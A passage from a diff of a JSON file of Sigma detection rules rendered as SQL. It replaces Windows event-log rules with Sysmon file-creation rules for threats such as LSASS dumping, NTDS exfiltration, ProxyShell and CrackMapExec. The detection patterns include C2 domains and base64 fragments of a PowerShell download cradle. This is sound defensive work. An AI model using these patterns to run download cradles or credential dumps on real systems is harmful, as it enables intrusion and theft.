RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE 
'%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' 
ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_mal_adwind.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", + "title": "NPPSpy Hacktool Usage", + "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "status": "test", + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND 
= ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the 
trustwave report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003.003" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE 
'%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": 
"test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE 
'%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE 
'\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE 
